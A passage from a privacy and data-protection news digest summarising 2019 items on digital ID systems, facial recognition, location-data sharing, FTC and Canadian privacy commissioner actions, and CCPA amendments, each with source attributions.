privacy policies of the companies. But others from CBSA headquarters noted among themselves that privacy concerns remain over what happens to the DNA once the CBSA hands it over. As a result, an operational bulletin went out to all branches ordering them to get approval from CBSA headquarters and the case management teams within the agency before doing any further testing, and said all requests for testing must be submitted via email. Those exchanges also noted that DNA testing is not exclusively used in the cases of long-term detainees — those there longer than 99 days. [Global News]

Health / Medical

US – ONC Urges Patients to Consider Benefits, Risks of Third-Party Apps

The U.S. Office of the National Coordinator for Health IT is warning patients to weigh the benefits and risks of sharing electronic health information with third-party apps. “Secondary use of data creates privacy challenges that extend beyond the healthcare industry,” National Coordinator for HIT Don Rucker testified to a Senate committee this week. “Across all business sectors, individuals often have little say with respect to the secondary use and disclosure of their personal data. However, the misuse of health information can have lifelong consequences for the patient.” The ONC proposed a rule in March that calls for health care providers to allow patients to access their electronic health records by way of secure application programming interfaces, which would require certification through HL7’s Fast Healthcare Interoperability Resources. [Health Data Management]

Identity Issues

WW – Report Highlights Potential Economic Benefits of Digital IDs

The McKinsey Global Institute has released a report on the economic benefits of strong digital identification. The institute developed a framework to help understand the economic impact of digital IDs. The framework was formed by an analysis of the ways digital IDs are used in countries such as the U.S., U.K., India, Brazil, Nigeria and China. “We hope our initial research effort contributes to a greater understanding of how digital ID, designed with the right principles, implemented with strong controls, and enforced with well-considered policies, can create significant economic benefits for individuals and institutions and can protect individuals from the risk of abuse,” the report states. [McKinsey]

CA – Banks, Telecoms Work Together on Canadian Digital ID System

Canadian banks and telecoms are launching Verified.Me, a new digital ID system that will assist in accessing insurance and credit reporting services. The two industries have begun merging customer data onto Verified.Me’s app in hopes that the database will eventually extend its reach to business, health and government services. For security purposes, only individuals and organizations screened and accepted to the network will be able to obtain data from the app. TD Bank, Royal Bank of Canada, Scotiabank, CIBC and Desjardins, with Bank of Montreal and National Bank of Canada, are among the companies joining the system. [Motherboard]

CA – Securekey’s Verified.Me Digital Identity Network Goes Live

A proof-of-concept secure online login platform test [see news coverage] by the CRA and Toronto-based SecureKey late last year is now live in Canada. Announced today [see PR] with a partnership from Canada’s biggest banks, a ‘digital identity network’ called Verified.Me is available for CIBC, Desjardins, RBC, Scotiabank and TD customer in Canada. The company stated that BMO Bank of Montreal, National Bank of Canada and Sun Life Financial have plans ‘to launch soon.’ Verified.Me is a mobile app — available on both iOS and Android — that ensures your digital identity is safe online, specifically for any government documents and financial services. Verified.Me uses blockchain technology “to securely and privately transfer your personal information to trusted network participants.” If you download the app you will consent to share your personal info from its Connections tab and the company states you can “always stay in control by choosing when to share your information and with whom, reducing unnecessary oversharing of personal information in order to access the services you want.” Apart from the above financial institutions, the companies who help develop the Verified.Me tech is the Digital ID and Authentication Council of Canada (DIACC), the U.S. Department of Homeland Security Science and Technology Directorate (DHS S&T), Global Privacy and Security by Design, EnStream, Equifax, IBM and Prodigy Labs. [MobileSyrup | SecureKey launches federated digital ID product for Canadian bank customers | Canada’s banks launch SecureKey’s Verified.Me digital identity network | SecureKey launching online identification service backed by Canada’s big banks]

Law Enforcement

US – Law Enforcement Use of Facial-Recognition Tech Raises Alarms

Oregon’s Washington County Sheriff’s Office is implementing Rekognition, Amazon’s artificial-intelligence tool, into its surveillance efforts. Using a database of 300,000 mugshots taken since 2001, the sheriff’s department logged 1,000 facial searches with Rekognition last year, which helped improve police activity, including making arrests. Defense attorneys, artificial-intelligence researchers and civil rights advocates argue that the growth in policing by algorithm could lead to wrongful arrests or threats to privacy with instances of mistaken identity from inaccurate identifications by the software. [The Washington Post]

Location

WW – Twitter Accidentally Shares User Location Data with Advertising Partner

Twitter said it may have accidentally collected and shared location data of some users accessing its app through Apple devices with an advertising partner. In a blog post, the social media platform said the information collected was not retained and only existed in their systems for a short time and have informed the people whose accounts were impacted to let them know the bug has been fixed. The advertising partner did not receive data such as user’s twitter handle or other unique account ids that could have compromised identity, the company said. [Reuters]

Online Privacy

US – App Stores Drop Apps After Warnings of COPPA, FTC Act Violations

The U.S. FTC announced that Apple and Google app stores removed three dating apps that appeared to be violating the Children’s Online Privacy Protection Act and the Federal Trade Commission Act. Ukraine-based Wildec, which operates Meet24, FastMeet and Meet4U, was informed that the apps were accessible to users age 12 and up, which violates COPPA’s age provisions. The apps were also found to violate the COPPA Rule, which requires companies to post clear privacy policies while notifying parents and getting their verifiable consent before collecting, using or sharing the personal information of a child under the age of 13. [FTC.gov]

WW – Google Will Soon Let You Auto-Delete Your Location Tracking Data

Google is introducing a new feature for your Google account that will allow you to automatically delete your Location History and Web and App Activity data after a set period of time [see Google blog notice]. You’ll be able to delete the data after either three or 18 months, and it will then continue to be deleted on a rolling basis over time. The search giant’s location tracking practices got it into trouble last year when it emerged that Google would continue to track you even when you turn off the Location History setting [see news coverage]. In order to entirely stop your location from being tracked, you need to dig through your settings to also turn off the “Web and App Activity” setting. The feature being announced today deletes data for both, meaning that it should cover every bit of the location history data Google holds on you. Google says it’s rolling out the new feature worldwide “in the coming weeks” and that it will be available in addition to the existing options that allow you to delete this data manually. The company also mentions that Location History and Web and App Activity data are the first two bits of user data the feature will be available for, suggesting that the option might soon be available for more of your data. [The Verge | Google now lets you auto-delete your app activity, location and web history | Tracking Phones, Google Is a Dragnet for the Police | Google can see where you’ve been. So can law enforcement

| Android 101: How to stop location tracking | Google still tracks you through the web if you turn off Location History | IT Pro | Google may let users limit tracking in Chrome | Google Prepares to Launch New Privacy Tools to Limit Cookies | Google will soon let you auto-delete your location tracking data | The Wall Street Journal]
www.cnet.com: Google will now let you automatically delete location and activity history. Here’s how
www.zdnet.com: Google adds option to auto-delete search and location history data
www.washingtonpost.com: Google will soon allow users to auto-delete location history and search data

Other Jurisdictions

AU – Data-Driven Political Campaigns are Common Practice in Australia

As Australia prepares for elections this month, the country is one of the most susceptible in terms of online information gathering by political campaigns. Australia’s privacy laws do not cover political parties and candidates, which have access to the electoral roll data that features the names and addresses of 16 million compulsory voters. Political parties also use voter email addresses to match social media profiles and then combine those results with the roll data. “Most Australians have little idea about how many data points organisations like political parties, let alone Facebook, have on each of them,” Macquarie University Political Scientist Glenn Kefford said. “They would be shocked and probably disgusted.” [Reuters]

Privacy (US)

US – NIST Seeks Feedback for Privacy Framework Discussion Draft

The U.S. National Institute of Standards and Technology has started to accept feedback on the recently released discussion draft for its privacy framework. NIST seeks feedback on whether the privacy framework can be implemented with the structure of the “Framework for Improving Critical Infrastructure Cybersecurity,” as well as its coverage of privacy risk management and the informative references found within the document. “In general, NIST is interested in whether the Privacy Framework as proposed in this discussion draft could be readily usable as part of an enterprise’s broader risk management processes and scalable to organizations of various sizes — and if not, how it could be improved to suit a greater range of organizations,” the agency wrote in the announcement. Editor’s Note: NIST is hosting a Privacy Framework Roundtable here at the Global Privacy Summit, starting at 3:30 p.m. [NIST.gov]

US – Facebook, FTC Nearing Deal with 20-Year Oversight

The U.S. Federal Trade Commission is close to finalizing a settlement with Facebook that would include 20 years of oversight, in addition to previously reported fines. While an official agreement is not expected before the end of May, Facebook is already preparing for its fine after recently setting aside $3 billion. The reported oversight clause in this potential deal draws a parallel to a similar clause in the 2011 settlement between the FTC and the social network. [CNBC]

US – Amazon’s Kid-Friendly Echo Dot Is Under Scrutiny for Alleged Child Privacy Violations

A coalition of 19 child and privacy advocacy groups filed a complaint with the Federal Trade Commission [PR] claiming that Amazon’s Echo Dot Kids devices are unlawfully recording and storing the conversation data of young children. The coalition accuses Amazon of unlawfully storing data from conversations with children even after parents try to delete it. If true, the practice could violate the Children’s Online Privacy Protection Act (COPPA) [see FTC guidance]. Amazon’s Echo Dot Kids devices launched last year as a child-friendly version of the company’s other Alexa devices. However, the FTC filing alleges that the voice-activated device collects and stores the transcripts of conversations the children have with it, along with information on what content the young users engage with on the device. Likewise, Senators Ed Markey (D-MA), Josh Hawley (R-MO), Richard Blumenthal (D-CT), and Dick Durbin (D-IL) sent a letter to the FTC in May 9 requesting that the agency open an investigation into the matter writing: “We urge the Commission to take all necessary steps to ensure their privacy as ‘Internet of Things’ devices targeting young consumers come to market, including promptly initiating an investigation into the Amazon Echo Dot Kids Edition’s compliance with COPPA.” [The Verge | U.S. senators say Amazon smart speaker for kids violates privacy law | FTC complaint alleges Amazon’s Echo Dot Kids violates child privacy law | Alexa, does the Echo Dot Kids protect children’s privacy?]

US – Privacy-Minded U.S. Lawmakers Divided Over Giving More Powers to FTC

At the hearing of a House of Representatives Energy and Commerce subcommittee [docs, watch] Democratic and Republican lawmakers both stressed the need for bipartisan privacy legislation but some had doubts about strengthening the Federal Trade Commission, which is expected to be tasked with enforcing an eventual law. US Congress Woman Cathy McMorris Rodgers, said that she would support a national standard for data privacy and wanted to hold companies accountable for violations. But she worried about giving more power to the agency, saying she did not want to the FTC to be converted into “a massive rule-making regime.” FTC Chairman Simons asked for enhanced rule-making authority for the agency to enforce any privacy legislation but pressed for it to be limited to the one issue and backed by Democratic Commissioner Rohit Chopra, urged that any legislation have clear and specific rules. “Please do not do it. Do not give us broad rule-making authority. Give us targeted rule-making authority,” he said. “The last thing that we want is for you to dump that question on us.” Simons and one of the four commissioners were also asked about an expected FTC settlement with Facebook Inc for violating a privacy consent decree and tightening oversight of users’ privacy. Both declined comment. [Reuters | FTC Members Unanimously Press Congress for Tough National Privacy Protections

| FTC Testifies Before the House Energy and Commerce Subcommittee On Its Work to Protect Consumers and Promote Competition]

US – New Requirements for FTC Data Security Settlements

Two of the FTC’s most recent data security settlements include new requirements that go beyond previous data security settlements. The new provisions: 1) require that a senior corporate officer provide to the FTC annual certifications of compliance; and 2) specifically prohibit making misrepresentations to the third parties conducting required assessments. A statement accompanying these settlements noted that the FTC has instructed staff to examine whether its privacy and data security orders could be strengthened and improved. The first matter is an administrative settlement with James V. Grago, Jr. doing business as ClixSense.com, a website where users earn money by viewing advertisements, performing online tasks, or completing online surveys [complaint & settlement]. The settlement has been put out for public comment. The second action involves UNIXIZ doing business as i-Dressup.com, and its CEO Zhijun Liu and its secretary Xichen Zhang. i-Dressup.com is a website that allows users, including children, to play dress-up games, design clothes, and decorate their online spaces. In January 2016, i-Dressup had at least 2.1 million users, of which approximately 245,000 were under the age of 13 years. [see complaint & stipulated judgment] The public will have an opportunity to comment on the ClixSense settlement because it is an administrative matter that is not final until after the comment period ends. It is likely that there will be comments on the new provisions identified above. [DBR on Data (DrinkerBiddle)]

Security

US – Report: C-Suite Execs Increasingly Targeted In Social Attacks

Verizon’s “Data Breach Investigations Report” found cyberattacks against C-suite executives are on the rise. The 2019 study found high-level executives are 12 times more likely to be the target of “social incidents” and nine times more likely to be targeted in social breaches. The report also found cyberattacks conducted by nation states represented 23% of the data breaches examined in 2019, up from 12% the previous year. In cases involving malware, ransomware was the second most common type of those incidents, representing 24% of the cases. [ZDNet]

CA – 56% Increase in Privacy Breaches in First Quarter of 2019: OIPC NL

The number of reported privacy breaches increased in the first quarter of 2019. The Office of the Information and Privacy Commissioner [OIPC] says it received 75 privacy breach reports from 21 separate public bodies in the first three months of the year [PR]. That is a 56% increase in the number of breaches from the previous reporting period, and is higher than the 58 or 59 breaches reported quarterly in 2018. The agencies or departments with the highest number of breaches during the first quarter of 2019 were the departments of Advanced Education, Skills and Labour, Service NL, Justice, Children Seniors and Social Development, and Memorial University. Most of the breaches—34—were by email while 19 were through mail-outs. There were two willful breaches. The OIPC is offering privacy breach training to any public body that seeks it out. [VOCM News (St. John’s)]

WW – Unsecure Customer Loyalty Programs are Ripe for Hacking Schemes

Retail rewards programs are becoming one of the most susceptible hacks as companies digitize. California-based Javelin Strategy & Research found that loyalty program hacks doubled from 2017 to 2018, while an unnamed loyalty-fraud prevention group estimated in its own report loyalty program–related crime produces $1 billion a year in losses. Hackers access loyalty programs to not only steal account information and gain access to other accounts, but also to steal or sell loyalty point balances. Such schemes have been employed toward programs at McDonald’s, Dunkin’ Donuts, Marriott and Hilton. Some of the companies offering loyalty programs have begun implementing stronger security measures, like multi-factor authentication. [New York Times]

Smart Cities and Cars

CA – Sidewalk Lab Smart City Project Threatens Privacy and Human Rights: Amnesty Intl

Sidewalk Toronto, a joint venture between Sidewalk Labs, which is owned by Google parent company Alphabet Inc., and Waterfront Toronto, is planning a high-tech neighbourhood called Quayside for the city’s eastern waterfront. The 12-acre smart city will be underpinned by a network of sensors and other connected technology that will monitor and track environmental and human behavioural data. Sensors and cameras throughout and effectively create a “digital layer”. This digital layer may result monitoring actions of individuals and collection of their data. According to Daneilla Barreto [LinkedIn], a digital activism coordinator for Amnesty International Canada, the project will normalize the mass surveillance and is a direct threat to human rights [read her April 27 article]. In the Responsible Data Use Policy Framework released last year, the Sidewalk Toronto team made a number of commitments with regard to privacy. However, Barreto argues that in the Sidewalk Labs conversation, privacy has been framed as a purely digital tech issue. Debates have focused on questions of data access, who owns it, how will it be used, where it should all be stored and what should be collected. In other words it will collect the minutest information of an individual’s everyday living. For example, track what medical offices they enter, what locations they frequent and who their visitors are, in turn giving away clues to physical or mental health conditions, immigration status, whether if an individual is involved in any kind of sex work, their sexual orientation or gender identity or, the kind of political views they might hold. It will further affect their health status, employment, where they are allowed to live, or where they can travel further down the line. All of these raise a question: Do citizens want their data to be collected at this scale at all? And this conversation remains long overdue. [Packt See also: 5G Wireless Apocalypse: Smart City of Surveillance | Sidewalk Labs: What public sector data governance would look like

Telecom / TV

US – Verizon, T-Mobile, Sprint, and AT&T Hit with Class Action Lawsuit Over Selling Customers’ Location Data

On May 2, lawyers filed lawsuits in US district court in Maryland against T-Mobile [complaint], AT&T [complaint], and Sprint [complaint] and Verizon [complaint] The lawsuits filed by Z LAW, a Maryland “consumer protection law firm” are the first instance of individual telco customers pushing to be awarded damages after Motherboard revealed in January that AT&T, T-Mobile, and Sprint had all sold access to the real-time location of their customers’ phones to a network of middlemen companies, before ending up in the hands of bounty hunters. Motherboard previously paid a source $300 to successfully geolocate a T-Mobile phone through this supply chain of data. The thrust of the complaints center around whether each telco violated section 222 of the Federal Communications Act (FCA), which says that the companies are obligated to protect the CPI and CPNI of its customers, and whether the Plaintiff’s and Class Members’ CPNI was accessible to unauthorized third parties during the relevant period. The class in each lawsuit covers an approximation of the telcos’ individual customers between April 30, 2015 and February 15, 2019: 100 million for Verizon, 100 million for AT&T, 50 million for T-Mobile, and 50 million for Sprint. Each lawsuit is filed in the name of at least one customer for each telco, and they are seeking unspecified damages to be determined at trial. Motherboard also previously reported that 250 bounty hunters had access to AT&T, T-Mobile, and Sprint phone location data from another company that catered specifically to the bail bond industry. Some of that data included highly precise assisted GPS data, which is usually reserved for 911 responders. [Vice | Major Carriers Hit With Lawsuits Over Location Data Sharing]

US – Massachusetts High Court Rules on Constitutional Protection for Cell Phone Location Data

On April 23 the Supreme Judicial Court of Massachusetts release its ruling in Commonwealth v. Almonor [summary & ruling] and on April 24 the court release its ruling in Commonwealth v. Fredericq [PDF] both rulings addressing law enforcement access to and use of cell phone location data. In Almonor, the court found that pinging a cell phone’s real-time location constitutes a search in the constitutional sense. In Fredericq, the court held that warrantless location tracking was an unlawful search and that information obtained as a result of that tracking was “fruit of the poisonous tree” that the defendant could suppress. The rulings acknowledge the challenges inherent in adapting age-old legal concepts to new technology, but also show that some invasions of privacy may be permissible depending upon the circumstances. While the court’s decisions addressed Article 14 of the Massachusetts Declaration of Rights rather than the Fourth Amendment to the U.S. Constitution, the analytical decisions may offer guidance as to how other courts may rule on similar issues in the absence of on-point precedent from the U.S. Supreme Court. The rulings in these cases are consistent with a societal expectation that merely using a cell phone does not constitute consent to government tracking of one’s location. But that does not mean that the government is precluded from obtaining location information. Just as the courts are tasked with crafting jurisprudence that “can adapt to changes in the technology of real-time monitoring,” law enforcement will need to find ways to permissibly obtain the wealth of information that cell phones contain. A concurring opinion in Almonor suggested that the legislature could assist this task by drafting legislation to permit telephonic or electronic requests for search warrants, rather than requiring police to appear in front of a judge. As the judiciary and law enforcement grapple with the scope of state and federal constitutional privacy rights, the Almonor and Fredericq decisions may serve as persuasive guideposts. [Technology Law Dispatch (ReedSmith)]

US – FCC Proposes Blocking Robocalls by Default

The Federal Communications Commission (FCC) has been fighting robocalls for years, but as anyone with a cell phone can tell you, they’re still getting through. Now, the Commission wants to make it legal for phone companies to block unwanted robocalls by default. Chairman Ajit Pai has circulated a declaratory ruling [read Pai blog post 2 pg ruling & fact sheet] that, if adopted, would give carriers permission to develop new call blocking tools. The ruling could also allow consumers to prohibit calls from numbers that aren’t on their contact lists. The proposed change targets spam robocalls that hijack legitimate, in-service numbers. Carriers like Comcast, T-Mobile, AT&T and Verizon are working to deploy STIR/SHAKEN technology that labels calls from authentic numbers. But the FCC says many voice providers have held off on developing call blocking tools because it was unclear whether those tools were legal under FCC rules. If adopted, this ruling could lead to new call blocking tools, like those used by third-party apps. The systems would include protections against blocking emergency calls, and consumers would be able to opt-out of call blocking if they wish. The FCC will consider the proposal at its June 6th meeting [details], and if approved, it’s hard to say when this will go into effect. On May 15 the Pai and four other FTC commissioners also testified before The Subcommittee on Communications And Technology Committee On Energy & Commerce about robocalls and other FTC business – details & documents here & watch here starting at 11:19] [engadget | The FCC Wants Carriers to Start Automatically Blocking Robocalls for Free | How to stop pesky robocalls and texts to your cell phone]

US Legislation

US – California Assembly Privacy Committee Votes in Favor of Advancing CCPA Amendments

On April 30, the California Assembly’s Committee on Privacy and Consumer Protection, which has jurisdiction over matters related to privacy, the protection of personal information and information technology, held a committee hearing [agenda] in which it voted in favor of advancing eight industry-backed bills that would amend the California Consumer Privacy Act (CCPA) [infographic], set to take effect on Jan 1, 2020. To the benefit of businesses, the bills, which now move on to the Assembly’s Appropriations Committee, would clarify the text and limit the scope of the unprecedented, sweeping privacy law that grants consumers a great degree of transparency and choice with respect to their personal information, defined broadly under the act. If the bills survive the Assembly’s Appropriations Committee, they will come before the full Assembly before advancing to the California Senate, and would ultimately become law if signed by the governor. Also of note, two CCPA amendment bills, discussed further below, have been withdrawn from advancement to committee consideration. Two bills were withdrawn from committee consideration – AB 1760 – Privacy for All Act here and SB 753 – Narrowing the Definition of Sale here] The Assembly Privacy Committee voted to move the following bills that would amend the CCPA forward [description/discussion of the eight bills make up the remainder of this blog post]:

  1. AB 25 – Carving Out Employee Data [see here];
  2. AB 846 – Exception for Customer Loyalty Programs [see here];
  3. AB 873 – Clarifying the Definitions of “Personal Information” and “Deidentified” [see here];
  4. AB 874 – Refining the Meaning of “Personal Information” and “Publicly Available” [see here];
  5. AB 1564 – Consumer Rights Requests [see here];
  6. AB 981 – Insurance Information [see here];
  7. AB 1146 – Exception for Vehicle Repair Information [see here]; and 8) AB 1355 – Revising Drafting Errors [see here] [Data Privacy Monitor]

Workplace Privacy

CA – Privacy Rules on Employee Monitoring Differ Between Provinces

Lexology reports on Canadian privacy laws that cover tracking employees’ activities. The provinces of Quebec, British Columbia and Alberta have legislation on the collection, use and disclosure of personal information in the private sector; however, Ontario has rules on the use of personal health information in the same area. In order to address the patchwork of laws across Canada, employers are advised to disclose any monitoring activity they conduct, establish their rationale for any form of tracking, create a clear policy on any data collection practices, and obtain employee consent. [Lexology]

+++

 

15-30 April 2019

Biometrics

EU – EU Parliament Votes to Create Biometrics Database

European Union lawmakers are going forward with the creation of a database that collects biometric data for all non-EU citizens in Europe’s visa-free Schengen area. The system would bring together current databases that track migration, travel and crime and is expected to be approved by the European Parliament. This new database will be known as the Common Identity Repository (CIR) and is set to unify records on over 350 million people. CIR will aggregate both identity records (names, dates of birth, passport numbers, and other identification details) and biometrics (fingerprints and facial scans), and make its data available to all border and law enforcement authorities. The plans for the all-encompassing system go against the EU’s position in 2010 when it said such a database would “constitute a gross and illegitimate restriction of individuals’ right to privacy and data protection” and “pose huge challenges in terms of development and operation.” Data protection professionals believe the system is unnecessarily invasive, while former member of the European Commission’s Security Advisory Group Reinhard Kreissl said the database “could be useless, or even counterproductive.” [Politico | ZDNet]

US – NYT Builds Facial-Recognition System for $60 for ‘The Privacy Project’

As part of its recent launch of “The Privacy Project,” The New York Times reports on the facial images it was able to collect through cameras at Bryant Park. For the study, the Times gathered public images captured by three cameras that surveyed a section of the park. One day of footage was run through Amazon’s commercial facial-recognition service, which resulted in 2,750 faces detected over a nine-hour period. The Times reports the total cost of all the work came to $60. In an op-ed for “The Privacy Project,” Charlie Warzel writes why it is time to “radically expand” the definition of privacy. [The New York Times]

Big Data / Analytics / Artificial Intelligence

US – Big Data Companies Face Increased State and Federal Scrutiny

Norton Rose Fulbright’s US Head of Data Protection, Privacy and Cybersecurity Jeewon Serrato and Partner Vic Domen write about the increased scrutiny that big data companies like Google and Facebook are now facing. A number of state attorneys general are preparing to have discussions with the US Federal Trade Commission to discuss their concerns about the use of massive amounts of personal data in the digital ad marketplace. There is a trend among federal and state enforcers to bring these online platforms and technology markets under higher scrutiny. [Norton Rose Fulbright LLP]

Canada

CA – OPC Releases Discussion Document for Trans-Border Data Flow Consultation

The Office of the Privacy Commissioner of Canada has released a supplementary discussion document to explain its decision to revise its policy position on trans-border data flows. The OPC also lists out eight questions in order to better facilitate the consultation it launched. “Our change in position is based ultimately on our obligation to ensure that our policies reflect a correct interpretation of the current law,” the discussion document reads. “During the Equifax investigation, it became apparent that the position that a transfer … is not a ‘disclosure’ is debatable and likely not correct as a matter of law.” [priv.gc.ca]

CA – OPC Recommends Consent for Cross Border Data Transfers

On April 9, 2019, the Office of the Privacy Commissioner of Canada (OPC) issued a new Consultation on transborder dataflows, recommending that organizations be required to obtain individuals’ consent — express or implied — for transfers of personal data outside of Canada. The OPC is accepting comments on the Consultation through June 4, 2019 [on April 23 OPC issued a “supplementary discussion document“]. The Consultation is a significant departure from the OPC’s current interpretation of cross-border data transfer requirements [see OPC guidelines here] under Canada’s Personal Information Protection and Electronic Documents Act [PIPEDA: see OPC guidance here]. These well-established cross-border requirements allowed organizations to rely on the principle of accountability to protect personal data transferred outside of Canada. The Consultation proposes requiring express or implied consent for cross-border data transfers, depending on the sensitivity of the information at issue and the reasonable expectations of the individual. To support its proposed change, the OPC has explained that the accountability principle merely regulates cross border data processing “in part,” and that “nothing in PIPEDA exempts data transfers from consent requirements.” As a result, the OPC’s view is that the general requirement under PIPEDA — that organizations obtain consent for any collection, use or disclosure of personal data, unless an enumerated exception applies — similarly extends to cross border data transfers. It is reasonable to require organizations to inform consumers of cross-border transfers as part of required privacy disclosures – including in privacy notices and policies. A consent requirement would exceed even the GDPR’s limitations on cross-border data transfers, and could be disruptive to US and Canadian businesses. [cyber/data/privacy insights (Cooley) | OPC issues supplementary discussion document for its consultation on transborder dataflows | The battle over data localization | The many lessons of the Equifax data breach | Rewriting Canadian privacy law: Commissioner signals major change on cross-border data transfers | Do Cross-Border Data Transfers From Canada Require Consent? | Privacy Commissioner Proposes a Consent Requirement for Transborder Data Flows | OPC Proposes a Reversal in its Approach to Transfers of Personal Information to Service Providers for Processing

CA – OPC Taking Facebook to Court, Says Company Breached Privacy Laws

Canada’s federal privacy watchdog plans to take Facebook to court following an investigation that found the social media giant broke a number of privacy laws and failed to take responsibility for protecting Canadians’ personal information. “Canadians are at risk because the protections offered by Facebook are essentially empty,” said Privacy Commissioner Daniel Therrien after releasing a blistering report into the company’s operations Thursday [see OPC PR, report #2019-002, info chart & Commissioner’s comments]. Therrien and his B.C. counterpart, Michael McEvoy, joined forces last spring to investigate the roles of Facebook and the Canadian company AggregateIQ in the scandal involving the British firm Cambridge Analytica. [watch full news conference & questions] [CBC News | ‘Their privacy framework was empty’: Facebook blasted by Canadian privacy watchdogs for breaking law and refusal to acknowledge findings | Facebook data leak: Province-by-province breakdown of affected Canadians

CA – YVR Rejects Ads with Information on Digital Privacy

OpenMedia [wiki], a Vancouver-based internet privacy group, says it tried to place ads pointing travellers to information on digital privacy rights at the Canada Line’s YVR station. The ads were rejected by the airport which has authority over the station [see OM PR]. The ads promote the group’s website, borderprivacy.ca, which was made in partnership with British Columbia Civil Liberties Association [see here & wiki here] and provides resources in multiple languages outlining rights on having digital devices searched at the border and how to submit a complaint if those rights are violated. The website also links to a petition seeking change to these search laws. YVR explained to the News by email that they felt the ad “pitted two groups against each other and it also has potential to add undue stress to the travel experience.” The airport also stated that it “aims to be non-political” and felt the link to a petition was problematic. YVR added that they provide their own resource website on passenger rights and advertises this site on its digital signage throughout the airport. Victoria Henry [here], a rights campaigner at OpenMedia [said] “This is a huge issue for a lot of people and a lot of people in Canada and folks who are crossing our border just don’t know anything about these rules and some of the vulnerabilities and potential privacy violations they could be facing.” The key issue, Henry explained, is that the laws haven’t been updated in quite some time, but cellphone use has increased significantly: “the laws that govern these kind of searches are just so out of date. They haven’t been meaningfully changed to reflect how much information we carry on our phones now.” [Vancouver is Awesome]

CA – SK OIPC: RM’s Lack of Record-Keeping Made Breach Investigation Impossible

Local governments in smaller communities continue to be “challenged” by provincial privacy legislation, Commissioner Ron Kruzeniski, Saskatchewan’s privacy commissioner, says [see here]. Lack of education about the Local Authority Freedom of Information and Protection of Privacy Legislation (LA FOIP), knowledge gaps and time available to process requests are among the most significant issues faced by the province’s towns, rural municipalities and villages, says the OIPC. In a report released April 5 [Investigation Report 298-2018], Kruzeniski weighed in on a case involving the Rural Municipality of Blaine Lake. [Also see his earlier January 8 Review Report 223-2018] the OIPC was unable to access necessary records. Evidently Blaine Lake had hired a new administrator who could not down the information Kruzeniski’s office requested The OIPC was told the old administrator “did not keep proper records” so the municipality couldn’t help. Consequently Kruzeniski was unable to proceed with the Blaine Lake investigation. Blaine Lake does not have a privacy breach protocol, Kruzeniski wrote. Kruzeniski in an interview having protocols in place are necessary since staff routinely changes and those protocols would give the rural municipality the ability to “continue on.” He said his office is finding smaller communities are more challenged by the privacy legislation since larger local governments can “engage staff” who are trained, who repeatedly do the required tasks and who become familiar with the process. We’re just finding many of [these small localities] just don’t have the resources to sort of handle the processing,” Kruzeniski said. [Saskatoon StarPhoenix]

CA – Court Sidesteps Constitutional Questions in Google ‘Right To Be Forgotten’ Case

Google was handed a setback this month in a reference case brought by the Privacy Commissioner of Canada last year [OPC 2018 notice] over the so-called “right to be forgotten”. A Federal Court adjudicator prothonotary Mireille Tabib ruled that the court won’t delve into the thorny constitutional questions wrapped up in the matter. Instead, the Federal Court will judge two specific points related to Canada’s privacy law, in a reference case brought forward by federal privacy commissioner Daniel Therrien: First, whether Google’s search engine could be deemed under PIPEDA to “collect, use or disclose personal information in the course of commercial activities”; and second, whether Google is exempt from the discussion on the grounds that it “involves the collection, use or disclosure of personal information for journalistic, artistic or literary purpose.” In a paper last year, Therrien’s office presented a legal interpretation which said that the right to de-index search results already exists under Canada’s Personal Information Protection and Electronic Documents Act (PIPEDA). Therrien launched the reference case in Federal Court to confirm that interpretation. But Google challenged the reference case, arguing not only that the company is exempt on both grounds in this instance, but that the specific questions from the OPC were too narrow because they did not address the constitutional questions potentially wrapped up in de-indexing search results. Google has appealed the ruling. In an emailed statement, the company’s lawyer argued that the case must be viewed as a matter of freedom of expression. In a separate ruling in March [see here], the same court official ruled that a coalition of media organizations, including Postmedia, could not receive standing as intervenors in the case. [Financial Post] | Scassa: Right to Be Forgotten Reference to Federal Court Attracts Media Concern]

CA – Academics and Rights Advocates Urge Senators to Bolster No-Fly List Appeal Process

The Liberal government’s sweeping national-security bill [C-59] doesn’t go far enough to protect the rights of people ensnared by Canada’s no-fly list [wiki], academics and civil-liberties advocates told senators Monday [before the National Security and Defence Committee –Notice & Web Cast]. The bill does take aim at the recurring problem of mistaken matches for names on the no-fly list, opening the door to a new system of redress numbers. However, critics say the legislative changes will do little to help those actually on the no-fly list who are stopped from getting on planes. Someone prevented from flying could ask for reconsideration of their case and appeal an unfavourable decision to the courts. However, the person is given only a summary of the intelligence and evidence used against him or her, which could include hearsay, Cara Zwibel of the Canadian Civil Liberties Association said. In addition, the judge dealing with a case can rely on secret evidence that was not included in the summary, she told the senators. “The appellant’s right to be heard is not meaningful if she or he does not know the case to meet.” She added that the process could be improved by assigning a special legal advocate, one with the clearance to review and test the government’s case Errol Mendes, a law professor at the University of Ottawa, said the law should “definitely include special advocates” to represent people the government puts on the list. He also stressed to the committee that there is a “big difference” between a special advocate acting on behalf of a listed person and an amicus, who is effectively a servant of the court. Craig Forcese [see here], who also teaches law at the University of Ottawa, emphasized the importance of including special advocates not just in no-fly proceedings, but also to ensure fairness in passport-revocation cases. Privacy commissioner Daniel Therrien said that as a result of revisions to the proposed Liberal legislation adopted by the House of Commons, it is “now fairly balanced and clearly an improvement over the current law.” [BurnabyNow]

CA – NL OIPC Urges Police to Consider Privacy Reform

Newfoundland Information and Privacy Commissioner Victoria Woodworth-Lynas has called for the Royal Newfoundland Constabulary to consider changes to its privacy policies and practices. Woodworth-Lynas’ mandate stems from a breach of an officer’s personal and medical information by another officer last July. An investigation by the commissioner revealed the RNC did not offer sufficient protection for the officer’s breached information, which was accessed when the other officer retrieved a form that contained personal details about the victim from a manager’s office. “I have serious concerns regarding the lapse in physical security practices in this case,” Woodworth-Lynas said. “I strongly recommend further and targeted communication with all employees on this issue.” [The Telegram]

Consumer

WW – Rise of ‘Privacy Fatigue: 1/3 People Don’t Know How to Protect Online Privacy

